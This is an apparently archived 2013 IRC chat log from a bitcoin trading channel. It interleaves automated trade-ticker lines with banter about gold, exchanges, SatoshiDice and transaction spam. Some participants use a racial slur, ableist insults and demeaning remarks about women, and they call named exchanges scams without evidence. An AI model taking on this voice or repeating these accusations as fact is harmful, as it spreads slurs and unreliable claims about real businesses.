owner always objects to having teeth pulled. May 16 05:57:03 so there you go, teeth are the coin. problem solved. May 16 05:57:08 has this increased the value of teeth any ? May 16 05:57:23 on that sense i dont think gold is a currency either May 16 05:57:38 well, much like adult teeth, gold is finite. May 16 05:57:54 things are worth what people pay for them... May 16 05:57:54 silver is pretty much like seasalt, can make as much of the stuff as you can possibly ever want. May 16 05:58:04 Chaaang-Noi no, not at all. May 16 05:58:15 by this logic, teeth are nothing compared to fresh, still-beating hearts. May 16 05:58:16 gold bugs cant un derstand crypto, but honestly i thought crypto people would understand gold... May 16 05:58:24 but there are limited siamese twins too May 16 05:58:28 no one cares much May 16 05:58:29 meatcoin. May 16 05:58:31 for that matter, 19th century england was trying to create demand for silver by making 50lb silverware sets a sort of middle class standard May 16 05:58:37 that went nowehre, so... May 16 05:58:51 asciilifeform hearts don't keep fresh. May 16 05:58:55 teeth do. May 16 05:59:13 why not thighbones, then May 16 05:59:17 would work yes May 16 05:59:20 lol May 16 05:59:24 you don't have to kill someone to take his teeth tho May 16 05:59:25 skulls, etc May 16 05:59:28 our quest for a better currency May 16 05:59:30 i find your guys reaction to gold and silver as a store of value very funny :) May 16 05:59:32 it never ends May 16 05:59:34 and they're smaller, easier to carry and 32 of them May 16 05:59:43 i tell you. teeth. May 16 05:59:54 cbtc, oh yeah thats money, gold? lol! May 16 05:59:57 how about moon rocks? May 16 06:00:16 the theory is that "civilisation collapsed" and so now silver rounds are finally good for something May 16 06:00:25 (presumably other than being stolen from you) May 16 06:00:47 the theory of apocalyptic collapse is absurd imo May 16 06:00:48 hearts should please the demurrage weirdos May 16 06:00:56 use it or lose it May 16 06:00:58 if shit hits the fan May 16 06:01:02 no one wants your fucking gold May 16 06:01:18 ThickAsThieves for some reason that concept is hard to grasp. May 16 06:01:28 that reason may be historical recourse. May 16 06:01:46 they want food, weapons and women May 16 06:02:12 havent you seen Waterworld? geeez... May 16 06:02:19 :) May 16 06:02:51 how about this May 16 06:02:56 if you wanna cover your ass May 16 06:03:01 buy a golden gun May 16 06:03:07 lol May 16 06:03:07 then your covered either way May 16 06:03:09 [HAVELOCK] [ASICM] 10 @ 0.0182 = 0.182 BTC [+] May 16 06:03:18 with silver bullets May 16 06:03:19 'cept the dang thing's useless May 16 06:03:29 just in case werewolves are the cause May 16 06:03:32 ThickAsThieves http://www.google.com/search?q=golden+desert+eagle May 16 06:03:43 perfect! May 16 06:03:43 plating May 16 06:03:44 boring May 16 06:03:54 never underestimate the power of bling May 16 06:04:01 gold plated steel firing silver bullets. May 16 06:04:08 [HAVELOCK] [ASICM] 18 @ 0.0182 = 0.3276 BTC [+] May 16 06:04:15 instant payment system May 16 06:04:18 i suppose i gotta go snort powdered bohemia crystal nao May 16 06:04:40 ? May 16 06:05:14 what brand of recreationals would *that* be? May 16 06:05:48 [BTCTC] [TAT.ASICMINER] 2 @ 0.01764 = 0.0353 BTC [+] May 16 06:06:20 [BTCTC] [TAT.ASICMINER] 6 @ 0.01764 = 0.1058 BTC [+] May 16 06:06:29 [BTCTC] [TAT.ASICMINER] 49 @ 0.01726 = 0.8457 BTC [-] May 16 06:06:30 benkay superluxurious stuff : overpriced and no effect whatsoever. May 16 06:06:34 http://liveghana.tv/trending/man-with-the-golden-gun-gold-plated-ak-47-confiscated-during-arrest-of-mexican-cartel-leader-and-hes-got-gold-bullets-too.html May 16 06:06:36 it's what the wiggaz use. May 16 06:06:38 [BTCTC] [TAT.ASICMINER] 1 @ 0.0172 BTC [-] May 16 06:06:47 [BTCTC] [TAT.ASICMINER] 13 @ 0.0172 = 0.2236 BTC [-] May 16 06:07:45 some day i'll have use for bling May 16 06:07:56 i try to get by on delivering value right now May 16 06:08:07 [HAVELOCK] [ASICM] 112 @ 0.018 = 2.016 BTC [-] May 16 06:08:09 [HAVELOCK] [ASICM] 70 @ 0.0179 = 1.253 BTC [-] May 16 06:08:10 [HAVELOCK] [ASICM] 238 @ 0.01770011 = 4.2126 BTC [-] May 16 06:08:11 you deliver papa johns? May 16 06:08:24 that's not value May 16 06:08:27 that's diabetes May 16 06:08:46 ok as far as I can tell both mtgox and btce are salami slicing in the 5th decimal point and down. May 16 06:08:55 is this news? and does anyone give a shit? May 16 06:09:10 salami slicing? May 16 06:09:17 that means they keep it? May 16 06:09:20 yes May 16 06:09:27 nice May 16 06:09:37 randomly, too May 16 06:09:40 nice May 16 06:09:52 yo dude i herd u can't in2 floating point May 16 06:09:57 let me tell u bout these newfangled integers May 16 06:10:08 for fucks sake May 16 06:10:08 [BTCTC] [ASICMINER-PT] 1 @ 1.72 BTC [+] May 16 06:10:12 they're on floats aren't they ? May 16 06:10:26 it's big boy math mp May 16 06:10:32 Computer Science May 16 06:10:34 nominally, yes May 16 06:10:49 [BTCTC] [ASICMINER-PT] 1 @ 1.710001 BTC [-] May 16 06:11:08 asciilifeform bitstamp does that from 2nd decimal point May 16 06:11:34 kakobrekla: non-deterministically? May 16 06:11:39 [BTCTC] [ASICMINER-PT] 1 @ 1.71 BTC [-] May 16 06:11:42 I wasn't talking about straight-out truncation or rounding May 16 06:11:44 [BTCTC] [TAT.ASICMINER] 6 @ 0.01768 = 0.1061 BTC [+] May 16 06:12:36 dunno what you have in mind but min fee there is 0.01 usd even if btc value for which the fee is for is less than that May 16 06:12:55 [BTCTC] [ASICMINER-PT] 2 @ 1.7 = 3.4 BTC [-] May 16 06:12:58 where would the fun in deterministic satoshi handling be? May 16 06:13:15 heaven forfend any of us actually try to balance our books ever May 16 06:13:16 kakobrekla: I do know this. what I was talking about is the stated multiplications being very slightly off, in their favor. May 16 06:13:28 ah May 16 06:14:13 [BTCTC] [ASICMINER-PT] 1 @ 1.7 BTC [-] May 16 06:14:23 the infrasturcutre is laughable May 16 06:14:36 this is old story now May 16 06:14:54 will we need to wait for a whole new generation? May 16 06:15:00 or has first-to-market advantage ruined this space? May 16 06:15:01 if this is a bug, it is a very clever bug. May 16 06:15:05 * Chaaang-Noi has quit (Ping timeout: 245 seconds) (odd) May 16 06:15:12 er May 16 06:15:14 same question. May 16 06:15:54 asciilifeform "never assume malice when incompetence will do" is what they say about bitbet... i think it applies here better May 16 06:16:00 [BTCTC] [TAT.ASICMINER] 5 @ 0.01768 = 0.0884 BTC [+] May 16 06:16:08 [HAVELOCK] [ASICM] 112 @ 0.0182 = 2.0384 BTC [+] May 16 06:16:52 kakobrekla: I've been trying to reproduce the exact incompetence, for my simulated trader, with no success so far. tried every FP representation I could think of. May 16 06:17:19 lol May 16 06:17:22 you fail at failing May 16 06:17:35 :) May 16 06:18:56 http://trilema.com/2013/teeth/ May 16 06:19:02 there you go all, you're famous again May 16 06:19:26 hey my whores comment is missing May 16 06:19:27 wtf May 16 06:19:52 i got you on ignore that's why :D May 16 06:20:08 [HAVELOCK] [ASICM] 297 @ 0.01834 = 5.447 BTC [+] May 16 06:20:39 unrelated : "Please read the attached business proposal and get back to me at your earliest convenience with your thoughts and reaction. Email me on: farouk.kazeem@syriaweb.net" May 16 06:20:52 originally i thought it must be some bitcoin dood. May 16 06:22:27 but instead... May 16 06:23:08 [HAVELOCK] [HIM] 1 @ 1.9301 BTC [-] May 16 06:23:08 its regular money dood. May 16 06:23:36 he probably wants silver. May 16 06:24:08 [HAVELOCK] [ASICM] 105 @ 0.01833 = 1.9247 BTC [-] May 16 06:24:12 ah he wants to be put in touch with the supernodes then May 16 06:24:19 totally. May 16 06:24:28 Silver: 0.000007%, or 7 parts per million (%) May 16 06:24:28 Gold: < 0.000005%, or <5 parts per million (%) May 16 06:24:39 anyway, tomorrow i'm inspecting a new girl so i need my sleep. take it easy all. May 16 06:24:56 seems they are mining silver and gold at an 8 to one ratio as well May 16 06:25:06 im sure you pulled that 100x number out of your ass May 16 06:25:22 you care too much, c-n May 16 06:25:26 lol, have a good night May 16 06:25:57 [BTCTC] [ASICMINER-PT] 1 @ 1.670001 BTC [-] May 16 06:26:30 Chaaaang-Noi : May 16 06:26:41 CPM Group (2011). The CPM Silver Yearbook 2011 : total silver production in world history, 750mn ounces. May 16 06:27:01 total gold production, 171,300 tonnes (gmfs) May 16 06:27:07 [HAVELOCK] [ASICM] 125 @ 0.0178 = 2.225 BTC [-] May 16 06:27:54 (about 8 times as much) May 16 06:28:04 [23:18] http://trilema.com/2013/teeth/ <<< glad you got my "instant payment system" line in there, i think it went over everyone's head... or just wasnt funny May 16 06:28:12 8 is not really close to 100 :/ May 16 06:28:21 Chaaaang-Noi except the silver production is for 2010 May 16 06:28:27 and the gold production is since 5000 bc. May 16 06:28:50 yeah they were mining tons and tons of shit 5000 years ago! May 16 06:29:01 yes, actually. May 16 06:29:10 the current mining rate is about 8 to 1 May 16 06:29:13 anyway, take care all! May 16 06:29:24 you are very wrong on this issue, but good night **** BEGIN LOGGING AT Thu May 16 18:58:00 2013 May 16 18:58:02 [HAVELOCK] [ASICM] 15 @ 0.01724 = 0.2586 BTC [-] May 16 18:58:04 [HAVELOCK] [ASICM] 1 @ 0.01723801 BTC [-] May 16 18:58:05 [HAVELOCK] [ASICM] 33 @ 0.01722 = 0.5683 BTC [-] May 16 18:58:06 [HAVELOCK] [ASICM] 27 @ 0.0171 = 0.4617 BTC [-] May 16 18:58:07 [HAVELOCK] [ASICM] 1 @ 0.01686 BTC [-] May 16 18:58:08 [HAVELOCK] [ASICM] 300 @ 0.01667 = 5.001 BTC [-] May 16 18:58:08 [HAVELOCK] [ASICM] 1 @ 0.016596 BTC [-] May 16 18:58:10 [HAVELOCK] [ASICM] 100 @ 0.01650011 = 1.65 BTC [-] May 16 18:58:11 [HAVELOCK] [ASICM] 72 @ 0.0165001 = 1.188 BTC [-] May 16 18:58:12 [BTCTC] [TAT.ASICMINER] 1 @ 0.01701 BTC [-] May 16 18:58:14 [BTCTC] [TAT.ASICMINER] 10 @ 0.017 = 0.17 BTC [-] May 16 18:58:25 ;;ticker May 16 18:58:25 BTCUSD ticker | Best bid: 114.55000, Best ask: 114.90000, Bid-ask spread: 0.35000, Last trade: 114.90000, 24 hour volume: 43640.34106331, 24 hour low: 111.05001, 24 hour high: 116.47659, 24 hour vwap: 114.23695 May 16 18:58:26 [BTCTC] [TAT.ASICMINER] 33 @ 0.01696 = 0.5597 BTC [-] May 16 18:58:33 [BTCTC] [PAJKA.BOND] 2 @ 0.106 = 0.212 BTC [+] May 16 18:58:35 [BTCTC] [TAT.ASICMINER] 50 @ 0.01693 = 0.8465 BTC [-] May 16 18:58:39 [BTCTC] [TAT.ASICMINER] 1 @ 0.01692 BTC [-] May 16 18:58:47 there are better places to live than serbia May 16 18:58:55 [BTCTC] [TAT.ASICMINER] 16 @ 0.01692 = 0.2707 BTC [-] May 16 18:59:20 [BTCTC] [TAT.ASICMINER] 25 @ 0.01691 = 0.4228 BTC [-] May 16 18:59:26 actually belgrade wasn't bad at all. May 16 19:00:03 [BTCTC] [TAT.ASICMINER] 6 @ 0.0169 = 0.1014 BTC [-] May 16 19:00:36 [BTCTC] [TAT.ASICMINER] 18 @ 0.0169 = 0.3042 BTC [-] May 16 19:01:43 [BTCTC] [TAT.ASICMINER] 1 @ 0.01682 BTC [-] May 16 19:03:00 [BTCTC] [TAT.ASICMINER] 10 @ 0.0168 = 0.168 BTC [-] May 16 19:03:24 [BTCTC] [TAT.ASICMINER] 1 @ 0.0168 BTC [-] May 16 19:04:36 [BTCTC] [TAT.ASICMINER] 25 @ 0.0165 = 0.4125 BTC [-] May 16 19:09:09 poland? srsly? May 16 19:11:02 [HAVELOCK] [VTX] 1 @ 0.4201 BTC [+] May 16 19:14:04 [BTCTC] [ASICMINER-PT] 1 @ 1.76 BTC [-] May 16 19:15:02 [HAVELOCK] [VTX] 5 @ 0.4200008 = 2.1 BTC [-] May 16 19:16:23 [BTCTC] [CRYPTO-TRADE] 10 @ 0.2 = 2 BTC [+] May 16 19:17:12 [BTCTC] [CRYPTO-TRADE] 5 @ 0.2 = 1 BTC [+] May 16 19:20:02 [HAVELOCK] [ASICM] 20 @ 0.0178 = 0.356 BTC [+] May 16 19:20:04 [HAVELOCK] [ASICM] 3 @ 0.0178 = 0.0534 BTC [+] May 16 19:20:23 [BTCTC] [TAT.ASICMINER] 33 @ 0.0171 = 0.5643 BTC [+] May 16 19:20:57 [BTCTC] [BASIC-MINING] 1 @ 0.478 BTC [-] May 16 19:21:17 [BTCTC] [BASIC-MINING] 2 @ 0.479 = 0.958 BTC [+] May 16 19:23:02 [HAVELOCK] [ASICM] 1 @ 0.01756863 BTC [-] May 16 19:23:03 [HAVELOCK] [ASICM] 2 @ 0.0178 = 0.0356 BTC [+] May 16 19:23:05 [HAVELOCK] [ASICM] 30 @ 0.01799 = 0.5397 BTC [+] May 16 19:24:03 [HAVELOCK] [ASICM] 35 @ 0.0179 = 0.6265 BTC [-] May 16 19:24:04 [HAVELOCK] [ASICM] 3 @ 0.0179 = 0.0537 BTC [-] May 16 19:24:44 [BTCTC] [PAJKA.BOND] 50 @ 0.105 = 5.25 BTC [-] May 16 19:26:02 [HAVELOCK] [ASICM] 3 @ 0.0179 = 0.0537 BTC [-] May 16 19:26:03 [HAVELOCK] [ASICM] 15 @ 0.0179 = 0.2685 BTC [-] May 16 19:26:05 [HAVELOCK] [ASICM] 5 @ 0.0179 = 0.0895 BTC [-] May 16 19:30:45 [BTCTC] [TAT.ASICMINER] 4 @ 0.01656 = 0.0662 BTC [-] May 16 19:31:54 [BTCTC] [TAT.ASICMINER] 15 @ 0.0169 = 0.2535 BTC [+] May 16 19:32:02 [HAVELOCK] [ASICM] 1 @ 0.01756863 BTC [-] May 16 19:33:03 [HAVELOCK] [ASICM] 1 @ 0.0175 BTC [-] May 16 19:33:43 [BTCTC] [ASICMINER-PT] 1 @ 1.7401 BTC [-] May 16 19:33:58 [BTCTC] [ASICMINER-PT] 4 @ 1.76 = 7.04 BTC [+] May 16 19:34:03 [HAVELOCK] [ASICM] 1 @ 0.01756863 BTC [+] May 16 19:35:02 [HAVELOCK] [ASICM] 3 @ 0.01785 = 0.0536 BTC [+] May 16 19:35:51 [BTCTC] [ASICMINER-PT] 15 @ 1.776999 = 26.655 BTC [+] May 16 19:37:20 "I check MPex for my information because ya'll have a fee to get in. May 16 19:37:20 People who have that much BTC know what they're doing because they've been May 16 19:37:20 there from the beginning. So I figure those trades are the smartest ones May 16 19:37:20 to follow. Essentially...thanks for providing a more efficient source of May 16 19:37:20 info thats not distorted by the millions of fuckwads posting about May 16 19:37:20 whatever coin of the week they've created or people with scammer tags May 16 19:37:20 accusing other people, etc. Its like a fucking kindergarten classroom in May 16 19:37:20 here sometimes" May 16 19:37:24 i get lovemail. May 16 19:37:34 [BTCTC] [ASICMINER-PT] 1 @ 1.7768 BTC [-] May 16 19:38:07 [BTCTC] [BASIC-MINING] 3 @ 0.479 = 1.437 BTC [+] May 16 19:38:58 [BTCTC] [ASICMINER-PT] 1 @ 1.7769 BTC [+] May 16 19:39:56 [BTCTC] [BASIC-MINING] 2 @ 0.48 = 0.96 BTC [+] May 16 19:39:56 truffles likes to focus on the important stuff May 16 19:40:00 [BTCTC] [TAT.ASICMINER] 4 @ 0.0171 = 0.0684 BTC [+] May 16 19:40:47 I unlocked the thread to tell you that I am fine, and this is happening in accordance with orders (as understood by me). May 16 19:40:47 I am currently detained in a psychiatric institution in Helsinki, because I need rest. My physical well-being is taken care of. May 16 19:40:49 whoa. May 16 19:40:59 jurov you seen that ? May 16 19:41:18 mp, did you see the sdice news? May 16 19:41:50 ThickAsThieves yes. May 16 19:42:38 k May 16 19:43:52 [BTCTC] [TAT.ASICMINER] 96 @ 0.0171 = 1.6416 BTC [+] May 16 19:44:29 [MPEX] [S.MPOE] 4321 @ 0.00066968 = 2.8937 BTC [+] May 16 19:44:31 [MPEX] [S.MPOE] 9614 @ 0.00067001 = 6.4415 BTC [+] May 16 19:45:03 [HAVELOCK] [ASICM] 90 @ 0.01782 = 1.6038 BTC [-] May 16 19:45:04 [HAVELOCK] [ASICM] 3 @ 0.01782 = 0.0535 BTC [-] May 16 19:46:51 [BTCTC] [BITVPS] 4 @ 0.0007 = 0.0028 BTC [-] May 16 19:46:58 [BTCTC] [BITVPS] 1 @ 0.00069 BTC [-] May 16 19:47:03 [HAVELOCK] [ASICM] 30 @ 0.017 = 0.51 BTC [-] May 16 19:47:14 [BTCTC] [BITVPS] 750 @ 0.00068 = 0.51 BTC [-] May 16 19:47:46 [BTCTC] [BITVPS] 100 @ 0.00067 = 0.067 BTC [-] May 16 19:48:13 [BTCTC] [BITVPS] 73 @ 0.00066 = 0.0482 BTC [-] May 16 19:48:37 [BTCTC] [BITVPS] 4 @ 0.00066 = 0.0026 BTC [-] May 16 19:48:46 [BTCTC] [BITVPS] 225 @ 0.00065 = 0.1463 BTC [-] May 16 19:49:27 [BTCTC] [TAT.ASICMINER] 102 @ 0.0171 = 1.7442 BTC [+] May 16 20:00:52 [BTCTC] [TAT.ASICMINER] 1 @ 0.0171 BTC [+] May 16 20:04:20 who is? May 16 20:04:33 who's in the looney bin? May 16 20:04:57 ahahhaha, finally. May 16 20:05:17 culture and conditioning make people fucking insane May 16 20:05:38 and then they impound themselves to escape the reality of their mistakes. May 16 20:06:56 it's very interesting. i love it. May 16 20:07:13 i hope he learns to calm down. May 16 20:08:28 deadweasel tbh, that's troll signature. May 16 20:08:37 the account is closed. the person behind it gets the laurels. May 16 20:09:29 https://bitcointalk.org/index.php?topic=99497.5220 < this is why I stopped reading BTC talk May 16 20:10:43 the last two, May 16 20:11:03 bundling AM chips in cell phones so Africans can mine on the go May 16 20:11:17 lolok May 16 20:12:20 [BTCTC] [ASICMINER-PT] 1 @ 1.769 BTC [-] May 16 20:12:50 Hi guys May 16 20:12:52 [BTCTC] [ASICMINER-PT] 1 @ 1.77 BTC [+] May 16 20:13:00 [BTCTC] [ASICMINER-PT] 1 @ 1.775 BTC [+] May 16 20:13:14 [BTCTC] [ASICMINER-PT] 1 @ 1.7768 BTC [+] May 16 20:13:18 [BTCTC] [ASICMINER-PT] 1 @ 1.7769 BTC [+] May 16 20:13:39 is it normal the bitfinex prices stay static for like , say , 30 minutes May 16 20:13:54 keyboardwarrior bitfinex is a scam. May 16 20:13:55 lolumia May 16 20:14:02 anything is normal as long as you lose your btc. May 16 20:14:04 aw snap May 16 20:14:12 just open a position May 16 20:14:22 could you tell me why is it scam May 16 20:14:26 [MPEX] [S.DICE] 1000 @ 0.0025 = 2.5 BTC [+] May 16 20:14:48 at least my loss is only 0.15 USD at the moment May 16 20:16:59 any plataform i could start on with say , 5 usd May 16 20:17:03 [HAVELOCK] [ASICM] 20 @ 0.017 = 0.34 BTC [-] May 16 20:17:52 to each is own i barely even have a cellphone May 16 20:18:16 nexus s that i never charge May 16 20:18:44 wife has a note 2 which is pretty dope May 16 20:19:04 kybwarrior basically they stole the bitcoinica codebase May 16 20:19:15 [BTCTC] [TAT.ASICMINER] 264 @ 0.0171 = 4.5144 BTC [+] May 16 20:19:19 which was written in ruby and which was buggy as hell May 16 20:19:25 and they're running it from their garage. May 16 20:19:36 [BTCTC] [TAT.ASICMINER] 44 @ 0.017195 = 0.7566 BTC [+] May 16 20:20:04 and it seems something is broken May 16 20:20:13 prices wont move May 16 20:20:27 [BTCTC] [TAT.ASICMINER] 1 @ 0.017195 BTC [+] May 16 20:20:29 https://bitcointalk.org/index.php?topic=140484.0 May 16 20:20:33 read that anyway. May 16 20:22:05 S.DICE price holding well considering the events May 16 20:22:33 [BTCTC] [TAT.ASICMINER] 66 @ 0.017195 = 1.1349 BTC [+] May 16 20:22:54 if i only had one BTC May 16 20:23:05 to use the coinbr gate to MPEX May 16 20:24:56 coinbr requires a whole BTC? May 16 20:25:03 iirc it was a % May 16 20:25:15 Namworld im not sure what the events are. May 16 20:25:22 i mean... website ? who cares ? May 16 20:25:52 Yeah. It's still going to hurt SDice's business tho May 16 20:26:00 oh its free May 16 20:26:10 last time i checked it wasnt May 16 20:27:03 [HAVELOCK] [ASICM] 10 @ 0.01776999 = 0.1777 BTC [+] May 16 20:27:03 [HAVELOCK] [ASICM] 3 @ 0.01777 = 0.0533 BTC [+] May 16 20:27:41 Namworld maybe. May 16 20:27:43 oh it moved May 16 20:27:51 against me May 16 20:28:03 i dont get why May 16 20:28:18 as on clarkmoody price is rising May 16 20:28:34 scamz May 16 20:28:36 Well I'd need to know how many US SD players use proxy/Tor to play and how many just plainly access. May 16 20:28:46 But yeah May 16 20:29:05 Could scare new customers if they see some warning upon arriving on the website. May 16 20:29:11 Namworld by the same reasoning silkroad is dead. May 16 20:29:16 as it doesnm't have a website. May 16 20:29:17 Old players would probably just keep betting May 16 20:30:18 SR doesn't have a warning message. It's just hidden well. May 16 20:31:00 i'm just saying, websites. May 16 20:33:42 Yeah, yeah May 16 20:34:29 According to the 1.9% house edge, it went up 3.5 x 200 BTC increments May 16 20:34:41 dooglus' pic here http://i.imgur.com/RvpHgmA.png May 16 20:35:07 So 700 BTC expected profit May 16 20:36:03 [BTCTC] [ASICMINER-PT] 1 @ 1.7768 BTC [-] May 16 20:36:17 ;;calc 700/0.019 May 16 20:36:17 36842.1052632 May 16 20:36:32 ~36842 BTC in bets expected May 16 20:36:40 to have occured then May 16 20:37:01 Arf, I need to suggest dooglus to add betting volume since the beggining of the month May 16 20:37:48 sdice ain't dead May 16 20:37:52 it's got this great market dominance May 16 20:37:59 [BTCTC] [S.DICE-PT] 1 @ 0.00293 BTC [+] May 16 20:38:18 it seems to not be receiving a lot of love from its nominal maintainer though May 16 20:38:26 [BTCTC] [S.DICE-PT] 10 @ 0.002939 = 0.0294 BTC [+] May 16 20:38:31 http://www.youtube.com/watch?v=rfUYuIVbFg0 May 16 20:38:45 ;;calc 36842/1200 May 16 20:38:45 30.7016666667 May 16 20:38:52 dem blooz. May 16 20:39:28 Well Coinroll has about 1/30th of SatoshiDice's betting volume for the same period. May 16 20:39:34 I guess that's decent May 16 20:40:23 bitzino has lots of love for itself May 16 20:41:03 I hear so. Different game tho May 16 20:41:15 Coinroll is pretty much like SD May 16 20:42:21 Wtf, over 10,000 unconfirmed May 16 20:42:26 Didn't expect such market share May 16 20:42:30 is the play model really relevant to whether a given casino has their shit together? May 16 20:42:37 For something that litterally just started May 16 20:42:44 mircea-popescu May 16 20:42:52 mircea_popescu May 16 20:42:55 yes ? May 16 20:43:03 you see the unconfired transactions May 16 20:43:06 new record May 16 20:44:26 DDOS of the network with .00000025 May 16 20:46:14 0.00000025 * 200000 = 0.05 BTC cost to attack... May 16 20:46:29 With 200 000 transactions with such dust May 16 20:46:39 [BTCTC] [BASIC-MINING] 2 @ 0.48 = 0.96 BTC [+] May 16 20:46:50 At regular fee of 0.0005 May 16 20:47:02 Would cost 100 BTC to create 200 000 transactions May 16 20:47:26 well, there are over 11,000 pernding May 16 20:47:30 pending May 16 20:47:36 Yeah May 16 20:47:39 Could be more May 16 20:47:49 probably is May 16 20:48:04 What's the current blocksize limit? May 16 20:48:22 1mb I think - not 100 sure May 16 20:48:47 most are at 512 , pretty sure May 16 20:49:07 This is retarted... May 16 20:49:16 So many transactions May 16 20:49:39 Miners should just ignore 0 fees transactions May 16 20:49:40 jborkl yeah May 16 20:49:56 1mb is the absolute limit May 16 20:50:05 blocks are about 410 k avg May 16 20:51:11 The spam stopped May 16 20:51:40 I think it just crashed everything imo May 16 20:51:43 jborkl the interesting thing is May 16 20:51:51 i can get my payments through no problem, in spite of 10k pending May 16 20:52:00 i think either the miners are prioritizing or there's something else afoot May 16 20:52:10 (node connectivity issue ? i dunno ianae) May 16 20:52:54 it is interesting, depends on who is relaying and where the transactions are getting stuck at May 16 20:53:26 in fact i've looked, and i've not had a payment waited in >3 months May 16 20:53:31 everything next block May 16 20:54:33 It would almost be wise, for MPEX members that need to pay each other to use PUSH more often. Or new people need to sign up to PUSH with a high degree of speed and anonymity May 16 20:54:58 miners prioritize transactions with fees over feeless transactions May 16 20:55:30 If you're not a cheapskate and pay the damn 5 cent fee... May 16 20:55:34 You're ok May 16 20:55:36 jborkl what, and ruin ripple ?! May 16 20:55:42 so whats happening tot he blockchain May 16 20:55:49 with google, horowitz-andersen & co ? May 16 20:56:11 LOL, yeah ripple is trying to be WOT May 16 20:56:35 with a bunch of retards giving micro loans to each other May 16 20:56:35 i have been doing larger txes for a while now, no fee and nothing waits. and not that i dont want to pay fee, its just default client doesnt say it needs it. May 16 20:57:00 its about bitcoin days destroyed i think May 16 20:57:16 that counts too May 16 20:57:27 http://bitbet.us/bet/450/bitfurys-asic-will-work-with-power-1/ May 16 20:57:35 2:3 by now May 16 20:57:35 yeah, size counts too May 16 20:57:45 LOL, blockchains windows xp pro crashed May 16 20:59:03 [HAVELOCK] [ASICM] 100 @ 0.01784999 = 1.785 BTC [+] May 16 20:59:35 [BTCTC] [ASICMINER-PT] 1 @ 1.7769 BTC [+] May 16 21:00:00 blockchain.info: hosted on this HP laptop right here with blazing fast 128 kbit/s DSL May 16 21:00:13 methinks theyre trolling May 16 21:00:34 Who's bitfury... May 16 21:01:02 Namworld was some guy with a large fpga rig last year May 16 21:01:05 last i heard of them May 16 21:01:08 [BTCTC] [S.DICE-PT] 9 @ 0.002939 = 0.0265 BTC [+] May 16 21:01:09 the world leader in pretending to be the world leader in ascis May 16 21:01:12 havent you heard? May 16 21:01:14 lmao May 16 21:01:23 ... May 16 21:01:29 ThickAsThieves what fascinates me is this : guy comes out of blue skies plunks down 100 btc on yes. May 16 21:01:45 ok, tghat i can see. maybe he's trolling. m,aybe he's insane. maybe he has the chips. he'd know which, it's hios business May 16 21:01:48 i know, you are very excited about this May 16 21:01:55 so 50 btc are bet against. that i can also understand May 16 21:02:02 nobody went broke betting against asic delivery yet. May 16 21:02:14 BUT!!!! there's like 25 btc aka 5k usd riding on the yes from third parties. May 16 21:02:19 this i don't get. i tried. May 16 21:02:25 hehe May 16 21:02:34 i mean wtf, they can't have insider information May 16 21:02:44 there's 5k dollah wagered on what, the website ? May 16 21:02:49 the only proven way to be safe with asic biz is to wait til delivery May 16 21:02:52 what judgement went into that i wish to know May 16 21:02:56 otherwise you are just gambling May 16 21:03:32 many more losers than winners May 16 21:03:40 basically excluding the owner, that bet breaks 2:1 against May 16 21:03:44 what the fuck what odds are these. May 16 21:03:47 Is that a pun on bitfinex's statement? May 16 21:04:01 Namworld that ? May 16 21:04:16 "nobody went broke betting against asic delivery yet." May 16 21:04:22 um May 16 21:04:27 not afaik. May 16 21:04:30 Bitfinex has right under the logo this funny statement May 16 21:04:35 "Nobody went broke taking profits" May 16 21:04:38 what srlky ? heh. May 16 21:04:42 just wait until ripples are a buck each May 16 21:04:42 thats not a logo May 16 21:04:45 its a big font May 16 21:04:53 It's a bad logo... May 16 21:05:01 listen. "Nobody went broke taking profits" is like saying "the rain in spain stays mostly on the plain" May 16 21:05:09 no dinky obscure fringe scam invented this. May 16 21:05:29 It's funny cause it's false May 16 21:05:34 yeah May 16 21:05:48 mpex needs a logo May 16 21:05:56 http://www.stockhouse.com/bullboards/messagedetail.aspx?s=SGF&t=list&m=9285714&l=0&pd=1&r=0 May 16 21:05:59 there, 2005 May 16 21:06:00 technically if all you do is take profits, it would be impossible to go broke. in a general way. May 16 21:06:10 deadweasel inflation. May 16 21:06:11 but i agree with you in spirit May 16 21:06:17 oh ya May 16 21:06:20 inflation May 16 21:06:20 ;) May 16 21:06:21 shit May 16 21:06:37 well, still wouldn't be broke, but worthless, yes. May 16 21:06:43 :/ May 16 21:06:43 not to go into the complex points of taxation. May 16 21:06:59 [BTCTC] [S.DICE-PT] 1 @ 0.00297 BTC [+] May 16 21:07:06 [BTCTC] [S.DICE-PT] 14 @ 0.002978 = 0.0417 BTC [+] May 16 21:08:13 i love how people feel the need to wait for 6 confs when making deals with me May 16 21:08:16 am i that scary May 16 21:08:41 i wouldnt know how to doublespend on 0 confs May 16 21:08:45 just new and into high risk prop trades. May 16 21:10:01 wtf May 16 21:10:11 someone is trying to double spend on me May 16 21:10:15 great May 16 21:11:49 [BTCTC] [TAT.ASICMINER] 57 @ 0.017273 = 0.9846 BTC [+] May 16 21:12:38 [BTCTC] [ASICMINER-PT] 1 @ 1.776 BTC [-] May 16 21:12:47 ya taxes, dammit. May 16 21:12:49 [BTCTC] [ASICMINER-PT] 1 @ 1.76119 BTC [-] May 16 21:13:06 [BTCTC] [ASICMINER-PT] 1 @ 1.76 BTC [-] May 16 21:13:24 TAT: nop, b.i is buggy atm May 16 21:13:29 shows every TX as a double spend May 16 21:13:50 oh May 16 21:14:07 [BTCTC] [TAT.ASICMINER] 2 @ 0.017273 = 0.0345 BTC [+] May 16 21:14:23 Scrat yyouz just tryin git me May 16 21:14:50 git er May 16 21:15:02 [BTCTC] [PAJKA.BOND] 2 @ 0.106 = 0.212 BTC [+] May 16 21:16:30 hey putting asics in phones was my idea https://bitcointalk.org/index.php?topic=99497.msg2171426#msg2171426 May 16 21:16:31 wtf May 16 21:16:48 [BTCTC] [S.DICE-PT] 120 @ 0.00285 = 0.342 BTC [-] May 16 21:17:16 lol May 16 21:18:03 [HAVELOCK] [ASICM] 100 @ 0.01874999 = 1.875 BTC [+] May 16 21:18:37 [BTCTC] [COGNITIVE] 1 @ 0.23 BTC [-] May 16 21:19:05 When's the IPO, Scrat? =P May 16 21:19:37 [BTCTC] [ASICMINER-PT] 2 @ 1.76 = 3.52 BTC [-] May 16 21:19:39 By the way... if anyone wants to sell S.DICE shares but finds there's a lack of volume to sell them, PM me. May 16 21:20:03 [HAVELOCK] [ASICM] 6 @ 0.01874999 = 0.1125 BTC [+] May 16 21:20:11 I might buy 10-30k May 16 21:21:05 [BTCTC] [ASICMINER-PT] 1 @ 1.769 BTC [+] May 16 21:22:17 [BTCTC] [ASICMINER-PT] 1 @ 1.769 BTC [+] May 16 21:22:29 [BTCTC] 